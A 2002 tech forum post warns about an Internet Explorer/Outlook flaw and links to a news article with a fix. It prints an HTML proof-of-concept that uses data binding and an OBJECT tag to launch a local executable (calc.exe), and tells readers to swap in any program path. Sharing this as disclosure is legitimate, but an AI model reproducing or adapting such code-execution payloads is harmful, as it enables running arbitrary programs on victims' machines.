TechSpot

Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    http://www.theregister.co.uk/content/4/24274.html

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>


    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
     
Topic Status:
Not open for further replies.


Add New Comment

TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...


Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.